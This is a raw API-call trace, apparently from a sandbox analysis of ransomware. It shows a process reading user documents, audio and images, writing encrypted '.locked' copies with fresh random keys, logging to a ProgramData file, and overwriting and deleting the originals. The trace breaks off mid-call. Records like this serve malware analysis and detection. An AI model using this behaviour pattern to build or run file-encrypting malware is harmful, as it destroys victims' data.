1 [0306.697] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\i4iTuepd632fb1KkZ.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i4ituepd632fb1kkz.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0306.698] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x125e5d9c | out: lpMode=0x125e5d9c) returned 0 [0306.698] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\i4iTuepd632fb1KkZ.pptx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\i4ituepd632fb1kkz.pptx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0306.798] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0306.940] SetEvent (hEvent=0x150) returned 1 [0306.940] SetEvent (hEvent=0x21c) returned 1 [0306.940] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x125e5d9c | out: lpMode=0x125e5d9c) returned 0 [0306.940] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0307.298] SetEvent (hEvent=0x21c) returned 1 [0307.298] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0307.305] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0307.306] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390020*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239fa24, lpReserved=0x0 | out: lpBuffer=0x12390020*, lpNumberOfCharsWritten=0x1239fa24*=0xb) returned 1 [0307.318] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\r1qXEfMA4-j F9no2.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\r1qxefma4-j f9no2.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0307.318] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0307.319] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\r1qXEfMA4-j F9no2.pptx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\r1qxefma4-j f9no2.pptx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0307.319] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0307.319] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390040 | out: pbBuffer=0x12390040) returned 1 [0307.319] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766070 | out: pbBuffer=0x12766070) returned 1 [0307.319] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714181 | out: pbBuffer=0x12714181) returned 1 [0307.320] WriteFile (in: hFile=0x200, lpBuffer=0x12723000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239fd78, lpOverlapped=0x0 | out: lpBuffer=0x12723000*, lpNumberOfBytesWritten=0x1239fd78*=0x80, lpOverlapped=0x0) returned 1 [0307.325] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0307.328] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0307.328] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb30, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb30, ulNumEntriesRemoved=0x33f6fb10) returned 0 [0307.329] SetEvent (hEvent=0x1ac) returned 1 [0307.329] SetEvent (hEvent=0x12c) returned 1 [0307.329] SetEvent (hEvent=0x1f0) returned 1 [0307.329] ReadFile (in: hFile=0x1a4, lpBuffer=0x154d2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x154d2000*, lpNumberOfBytesRead=0x1239fd68*=0xc404, lpOverlapped=0x0) returned 1 [0307.332] WriteFile (in: hFile=0x200, lpBuffer=0x154d2000*, nNumberOfBytesToWrite=0xc404, lpNumberOfBytesWritten=0x1239fd74, lpOverlapped=0x0 | out: lpBuffer=0x154d2000*, lpNumberOfBytesWritten=0x1239fd74*=0xc404, lpOverlapped=0x0) returned 1 [0307.339] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0307.659] ReadFile (in: hFile=0x1a4, lpBuffer=0x154d2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x154d2000*, lpNumberOfBytesRead=0x1239fd68*=0x0, lpOverlapped=0x0) returned 1 [0307.659] CloseHandle (hObject=0x200) returned 1 [0307.680] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0307.844] CloseHandle (hObject=0x1a4) returned 1 [0307.845] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0307.845] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1239fe94 | out: lpMode=0x1239fe94) returned 0 [0307.845] WriteFile (in: hFile=0x1a4, lpBuffer=0x12380340*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x1239fe64, lpOverlapped=0x0 | out: lpBuffer=0x12380340*, lpNumberOfBytesWritten=0x1239fe64*=0x3c, lpOverlapped=0x0) returned 1 [0307.845] CloseHandle (hObject=0x1a4) returned 1 [0307.847] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\r1qXEfMA4-j F9no2.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\r1qxefma4-j f9no2.pptx")) returned 1 [0307.892] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0308.176] SetEvent (hEvent=0x104) returned 1 [0308.176] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0308.178] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0308.185] SetEvent (hEvent=0x22c) returned 1 [0308.185] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0308.346] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb30, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb30, ulNumEntriesRemoved=0x33f6fb10) returned 0 [0308.347] SetEvent (hEvent=0x190) returned 1 [0308.347] SetEvent (hEvent=0x134) returned 1 [0308.347] SetEvent (hEvent=0x198) returned 1 [0308.347] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\r1qXEfMA4-j F9no2.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\r1qxefma4-j f9no2.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0308.412] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x1239fe88 | out: lpMode=0x1239fe88) returned 0 [0308.413] WriteFile (in: hFile=0x200, lpBuffer=0x17ed0000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1239fe78, lpOverlapped=0x0 | out: lpBuffer=0x17ed0000*, lpNumberOfBytesWritten=0x1239fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0308.439] CloseHandle (hObject=0x200) returned 1 [0308.515] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\r1qXEfMA4-j F9no2.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\r1qxefma4-j f9no2.pptx")) returned 1 [0308.658] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0308.754] SetEvent (hEvent=0x220) returned 1 [0308.754] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0308.754] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0308.773] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x14fc9a24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x14fc9a24*=0xc) returned 1 [0308.774] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\62mMsJbyJlq 9a.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\62mmsjbyjlq 9a.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0308.774] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x14fc9d9c | out: lpMode=0x14fc9d9c) returned 0 [0308.774] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\62mMsJbyJlq 9a.wav.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\62mmsjbyjlq 9a.wav.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0309.408] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0309.414] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x14fc9d9c | out: lpMode=0x14fc9d9c) returned 0 [0309.414] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0309.496] SetEvent (hEvent=0x1e8) returned 1 [0309.496] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0309.514] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0309.514] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x124a1e94 | out: lpMode=0x124a1e94) returned 0 [0309.514] SetEvent (hEvent=0x1b8) returned 1 [0309.514] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0309.643] SetEvent (hEvent=0x104) returned 1 [0309.643] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0309.650] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0309.656] WriteFile (in: hFile=0x1e0, lpBuffer=0x14ec8000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276ee78, lpOverlapped=0x0 | out: lpBuffer=0x14ec8000*, lpNumberOfBytesWritten=0x1276ee78*=0xfa000, lpOverlapped=0x0) returned 1 [0309.689] CloseHandle (hObject=0x1e0) returned 1 [0309.711] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\aSlWuoctTT0Qhm.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\aslwuocttt0qhm.odp")) returned 1 [0309.788] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0310.217] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1239fa24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x1239fa24*=0xc) returned 1 [0310.311] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\7C-ulOQENOkPtsd-.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\7c-uloqenokptsd-.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0310.311] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0310.311] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\7C-ulOQENOkPtsd-.mp3.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\7c-uloqenokptsd-.mp3.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0310.770] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0310.942] SetEvent (hEvent=0x190) returned 1 [0310.942] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1239fd9c | out: lpMode=0x1239fd9c) returned 0 [0310.942] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0310.988] SetEvent (hEvent=0x1ac) returned 1 [0310.988] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0310.989] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0311.075] SetEvent (hEvent=0x22c) returned 1 [0311.075] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0311.104] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0311.104] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0311.108] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0311.108] SetEvent (hEvent=0x1e8) returned 1 [0311.108] SetEvent (hEvent=0x220) returned 1 [0311.108] SetEvent (hEvent=0x22c) returned 1 [0311.108] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0311.109] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0311.109] SetEvent (hEvent=0x150) returned 1 [0311.109] SetEvent (hEvent=0x1e8) returned 1 [0311.109] SetEvent (hEvent=0x220) returned 1 [0311.109] SetEvent (hEvent=0x22c) returned 1 [0311.109] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0311.109] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x12669e94 | out: lpMode=0x12669e94) returned 0 [0311.109] WriteFile (in: hFile=0x1bc, lpBuffer=0x125ee0c0*, nNumberOfBytesToWrite=0x5d, lpNumberOfBytesWritten=0x12669e64, lpOverlapped=0x0 | out: lpBuffer=0x125ee0c0*, lpNumberOfBytesWritten=0x12669e64*=0x5d, lpOverlapped=0x0) returned 1 [0311.110] CloseHandle (hObject=0x1bc) returned 1 [0311.110] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\7mm1j-VAYXO_h.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\7mm1j-vayxo_h.mp3")) returned 1 [0311.151] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\7mm1j-VAYXO_h.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\7mm1j-vayxo_h.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0311.469] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0311.683] SetEvent (hEvent=0x150) returned 1 [0311.683] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x12669e88 | out: lpMode=0x12669e88) returned 0 [0311.683] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0312.022] WriteFile (in: hFile=0x19c, lpBuffer=0x13e44000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12669e78, lpOverlapped=0x0 | out: lpBuffer=0x13e44000*, lpNumberOfBytesWritten=0x12669e78*=0xfa000, lpOverlapped=0x0) returned 1 [0312.054] CloseHandle (hObject=0x19c) returned 1 [0312.054] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\7mm1j-VAYXO_h.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\7mm1j-vayxo_h.mp3")) returned 1 [0312.423] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0312.493] SetEvent (hEvent=0x14c) returned 1 [0312.493] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0312.496] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0312.539] SetEvent (hEvent=0x14c) returned 1 [0312.539] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0312.542] SetEvent (hEvent=0x22c) returned 1 [0312.542] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0313.383] SetEvent (hEvent=0x1dc) returned 1 [0313.383] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0313.397] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0313.397] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0313.399] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0313.399] SetEvent (hEvent=0x184) returned 1 [0313.400] SetEvent (hEvent=0x190) returned 1 [0313.400] SetEvent (hEvent=0x1dc) returned 1 [0313.400] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0313.401] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0313.401] SetEvent (hEvent=0x150) returned 1 [0313.401] SetEvent (hEvent=0x184) returned 1 [0313.401] SetEvent (hEvent=0x190) returned 1 [0313.401] SetEvent (hEvent=0x1dc) returned 1 [0313.442] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\TwlVh5-7kS4lpqivPrW.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\twlvh5-7ks4lpqivprw.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0313.506] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0313.611] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x124a1e88 | out: lpMode=0x124a1e88) returned 0 [0313.611] WriteFile (in: hFile=0x1a4, lpBuffer=0x145f2000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124a1e78, lpOverlapped=0x0 | out: lpBuffer=0x145f2000*, lpNumberOfBytesWritten=0x124a1e78*=0xfa000, lpOverlapped=0x0) returned 1 [0313.635] CloseHandle (hObject=0x1a4) returned 1 [0313.663] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0313.700] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0313.701] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0313.706] SetEvent (hEvent=0x184) returned 1 [0313.706] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0313.707] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12659a24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x12659a24*=0xc) returned 1 [0313.825] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0313.826] SetEvent (hEvent=0x184) returned 1 [0313.826] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0313.828] SetEvent (hEvent=0x12c) returned 1 [0313.849] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0313.850] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb30, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb30, ulNumEntriesRemoved=0x33f6fb10) returned 0 [0313.850] SetEvent (hEvent=0x150) returned 1 [0313.851] SetEvent (hEvent=0x12c) returned 1 [0313.851] SetEvent (hEvent=0x1b8) returned 1 [0313.856] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0313.929] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0313.929] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0313.934] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0313.934] SetEvent (hEvent=0x190) returned 1 [0313.934] SetEvent (hEvent=0x1b8) returned 1 [0313.934] SetEvent (hEvent=0x1e8) returned 1 [0313.934] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0313.935] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0313.935] SetEvent (hEvent=0x150) returned 1 [0313.935] SetEvent (hEvent=0x1e8) returned 1 [0313.956] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0313.957] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb30, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb30, ulNumEntriesRemoved=0x33f6fb10) returned 0 [0313.957] SetEvent (hEvent=0x1e8) returned 1 [0313.958] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0313.959] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0313.959] SetEvent (hEvent=0x12c) returned 1 [0313.959] SetEvent (hEvent=0x1b8) returned 1 [0313.959] SetEvent (hEvent=0x1e8) returned 1 [0313.959] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0313.962] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0313.962] SetEvent (hEvent=0x150) returned 1 [0313.962] SetEvent (hEvent=0x1e8) returned 1 [0313.962] SetEvent (hEvent=0x1b8) returned 1 [0313.963] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u\\6b9NjMSdcI.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\bogs768mc0szs6u\\6b9njmsdci.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0313.966] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x1276fe88 | out: lpMode=0x1276fe88) returned 0 [0313.966] WriteFile (in: hFile=0x1c0, lpBuffer=0x13912000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276fe78, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesWritten=0x1276fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0313.998] CloseHandle (hObject=0x1c0) returned 1 [0313.999] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\MgwF6NEdCmu8wRMced1\\bOgs768mC0sZS6u\\6b9NjMSdcI.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\mgwf6nedcmu8wrmced1\\bogs768mc0szs6u\\6b9njmsdci.png")) returned 1 [0314.046] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0314.137] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0314.147] SetEvent (hEvent=0x184) returned 1 [0314.147] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x0 [0314.152] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0314.154] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0314.154] SetEvent (hEvent=0x220) returned 1 [0314.154] SetEvent (hEvent=0x1b8) returned 1 [0314.154] SetEvent (hEvent=0x20c) returned 1 [0314.154] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0314.155] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0314.155] SetEvent (hEvent=0x20c) returned 1 [0314.155] SetEvent (hEvent=0x1f0) returned 1 [0314.155] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0314.157] SetEvent (hEvent=0x20c) returned 1 [0314.157] SetEvent (hEvent=0x190) returned 1 [0314.157] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0314.258] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e020 | out: pbBuffer=0x1263e020) returned 1 [0314.258] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8050 | out: pbBuffer=0x124a8050) returned 1 [0314.258] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c181 | out: pbBuffer=0x1237c181) returned 1 [0314.258] WriteFile (in: hFile=0x1c8, lpBuffer=0x12ba0000*, nNumberOfBytesToWrite=0x80, 